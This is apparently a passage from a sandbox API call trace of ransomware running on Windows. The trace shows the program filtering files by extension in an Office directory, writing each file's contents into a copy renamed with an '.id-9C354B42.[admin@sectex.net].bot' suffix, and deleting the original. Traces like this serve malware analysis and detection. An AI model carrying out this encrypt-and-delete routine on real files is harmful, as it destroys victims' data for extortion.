	[0144.913] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.913] lstrlenW (lpString=".xlsx") returned 5
	[0144.913] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.913] lstrlenW (lpString=".ppt") returned 4
	[0144.913] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.913] lstrlenW (lpString=".zip") returned 4
	[0144.913] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.913] lstrlenW (lpString=".rar") returned 4
	[0144.913] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.913] lstrlenW (lpString=".bz2") returned 4
	[0144.913] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.913] lstrlenW (lpString=".7z") returned 3
	[0144.913] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.913] lstrlenW (lpString=".dbf") returned 4
	[0144.913] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.913] lstrlenW (lpString=".1cd") returned 4
	[0144.913] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60
	[0144.913] lstrlenW (lpString=".jpg") returned 4
	[0144.913] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.913] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0144.913] lstrlenW (lpString="FLOCH.VRD") returned 9
	[0144.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0144.931] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2028) returned 1
	[0144.931] CloseHandle (hObject=0x3bc) returned 1
	[0144.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd")) returned 0x20
	[0144.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0144.932] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.932] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0144.932] GetLastError () returned 0x0
	[0144.932] ReadFile (in: hFile=0x3bc, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x7ec, lpOverlapped=0x0) returned 1
	[0144.961] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x7f0, lpOverlapped=0x0) returned 1
	[0144.962] ReadFile (in: hFile=0x3bc, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.962] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0144.962] SetEndOfFile (hFile=0x3a4) returned 1
	[0144.962] CloseHandle (hObject=0x3a4) returned 1
	[0144.962] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.962] SetEndOfFile (hFile=0x3bc) returned 1
	[0144.964] CloseHandle (hObject=0x3bc) returned 1
	[0144.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.983] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd")) returned 1
	[0144.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.983] lstrlenW (lpString=".doc") returned 4
	[0144.983] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.983] lstrlenW (lpString=".docx") returned 5
	[0144.983] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1
	[0144.983] lstrlenW (lpString=".pdf") returned 4
	[0144.983] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.983] lstrlenW (lpString=".xls") returned 4
	[0144.984] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.984] lstrlenW (lpString=".xlsx") returned 5
	[0144.984] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1
	[0144.984] lstrlenW (lpString=".ppt") returned 4
	[0144.984] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString=".zip") returned 4
	[0144.984] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0144.984] lstrlenW (lpString=".rar") returned 4
	[0144.984] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString=".bz2") returned 4
	[0144.984] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString=".7z") returned 3
	[0144.984] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString=".dbf") returned 4
	[0144.984] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString=".1cd") returned 4
	[0144.984] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString=".jpg") returned 4
	[0144.984] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.984] lstrlenW (lpString=".doc") returned 4
	[0144.984] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString=".docx") returned 5
	[0144.984] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1
	[0144.984] lstrlenW (lpString=".pdf") returned 4
	[0144.984] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.984] lstrlenW (lpString=".xls") returned 4
	[0144.984] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.985] lstrlenW (lpString=".xlsx") returned 5
	[0144.985] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1
	[0144.985] lstrlenW (lpString=".ppt") returned 4
	[0144.985] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0144.985] lstrlenW (lpString=".zip") returned 4
	[0144.985] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0145.034] lstrlenW (lpString=".rar") returned 4
	[0145.035] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0145.035] lstrlenW (lpString=".bz2") returned 4
	[0145.035] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0145.035] lstrlenW (lpString=".7z") returned 3
	[0145.035] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0145.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0145.035] lstrlenW (lpString=".dbf") returned 4
	[0145.035] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0145.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0145.035] lstrlenW (lpString=".1cd") returned 4
	[0145.035] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0145.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57
	[0145.035] lstrlenW (lpString=".jpg") returned 4
	[0145.035] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0145.035] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0145.035] lstrlenW (lpString="GRAPH.HXS") returned 9
	[0145.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.036] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=610086) returned 1
	[0145.036] CloseHandle (hObject=0x3bc) returned 1
	[0145.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs")) returned 0x20
	[0145.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.036] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.036] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0145.037] GetLastError () returned 0x0
	[0145.037] ReadFile (in: hFile=0x3bc, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x94f26, lpOverlapped=0x0) returned 1
	[0145.068] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x94f30, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x94f30, lpOverlapped=0x0) returned 1
	[0145.079] ReadFile (in: hFile=0x3bc, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.079] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0145.079] SetEndOfFile (hFile=0x3b4) returned 1
	[0145.079] CloseHandle (hObject=0x3b4) returned 1
	[0145.079] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.079] SetEndOfFile (hFile=0x3bc) returned 1
	[0145.676] CloseHandle (hObject=0x3bc) returned 1
	[0145.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs")) returned 1
	[0145.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.780] lstrlenW (lpString=".doc") returned 4
	[0145.780] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0145.780] lstrlenW (lpString=".docx") returned 5
	[0145.780] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1
	[0145.780] lstrlenW (lpString=".pdf") returned 4
	[0145.780] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0145.780] lstrlenW (lpString=".xls") returned 4
	[0145.780] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0145.780] lstrlenW (lpString=".xlsx") returned 5
	[0145.780] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1
	[0145.780] lstrlenW (lpString=".ppt") returned 4
	[0145.780] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0145.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.780] lstrlenW (lpString=".zip") returned 4
	[0145.781] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString=".rar") returned 4
	[0145.781] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString=".bz2") returned 4
	[0145.781] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0145.781] lstrlenW (lpString=".7z") returned 3
	[0145.781] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString=".dbf") returned 4
	[0145.781] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString=".1cd") returned 4
	[0145.781] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString=".jpg") returned 4
	[0145.781] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString=".doc") returned 4
	[0145.781] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0145.781] lstrlenW (lpString=".docx") returned 5
	[0145.781] lstrcmpiW (lpString1=".docx", lpString2="H.HXS") returned -1
	[0145.781] lstrlenW (lpString=".pdf") returned 4
	[0145.781] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString=".xls") returned 4
	[0145.781] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString=".xlsx") returned 5
	[0145.781] lstrcmpiW (lpString1=".xlsx", lpString2="H.HXS") returned -1
	[0145.781] lstrlenW (lpString=".ppt") returned 4
	[0145.781] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0145.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.781] lstrlenW (lpString=".zip") returned 4
	[0145.782] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0145.782] lstrlenW (lpString=".rar") returned 4
	[0145.782] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0145.782] lstrlenW (lpString=".bz2") returned 4
	[0145.782] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0145.782] lstrlenW (lpString=".7z") returned 3
	[0145.782] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0145.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.782] lstrlenW (lpString=".dbf") returned 4
	[0145.782] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0145.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.782] lstrlenW (lpString=".1cd") returned 4
	[0145.782] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0145.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS") returned 57
	[0145.782] lstrlenW (lpString=".jpg") returned 4
	[0145.782] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0145.782] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0145.782] lstrlenW (lpString="GRAPH_COL.HXT") returned 13
	[0145.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.793] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=205) returned 1
	[0145.793] CloseHandle (hObject=0x31c) returned 1
	[0145.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt")) returned 0x20
	[0145.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.793] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.793] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.794] GetLastError () returned 0x0
	[0145.794] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xcd, lpOverlapped=0x0) returned 1
	[0145.795] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0145.795] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.795] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0145.796] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.796] CloseHandle (hObject=0x3c0) returned 1
	[0145.796] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.796] SetEndOfFile (hFile=0x31c) returned 1
	[0145.798] CloseHandle (hObject=0x31c) returned 1
	[0145.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.798] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt")) returned 1
	[0145.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.799] lstrlenW (lpString=".doc") returned 4
	[0145.799] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0145.799] lstrlenW (lpString=".docx") returned 5
	[0145.799] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0145.799] lstrlenW (lpString=".pdf") returned 4
	[0145.799] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0145.799] lstrlenW (lpString=".xls") returned 4
	[0145.799] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0145.799] lstrlenW (lpString=".xlsx") returned 5
	[0145.799] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0145.799] lstrlenW (lpString=".ppt") returned 4
	[0145.799] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0145.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.799] lstrlenW (lpString=".zip") returned 4
	[0145.799] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0145.799] lstrlenW (lpString=".rar") returned 4
	[0145.799] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0145.799] lstrlenW (lpString=".bz2") returned 4
	[0145.799] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0145.799] lstrlenW (lpString=".7z") returned 3
	[0145.799] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0145.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.799] lstrlenW (lpString=".dbf") returned 4
	[0145.799] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".1cd") returned 4
	[0145.800] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".jpg") returned 4
	[0145.800] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".doc") returned 4
	[0145.800] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0145.800] lstrlenW (lpString=".docx") returned 5
	[0145.800] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0145.800] lstrlenW (lpString=".pdf") returned 4
	[0145.800] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString=".xls") returned 4
	[0145.800] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString=".xlsx") returned 5
	[0145.800] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0145.800] lstrlenW (lpString=".ppt") returned 4
	[0145.800] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".zip") returned 4
	[0145.800] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString=".rar") returned 4
	[0145.800] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0145.800] lstrlenW (lpString=".bz2") returned 4
	[0145.800] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0145.800] lstrlenW (lpString=".7z") returned 3
	[0145.800] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
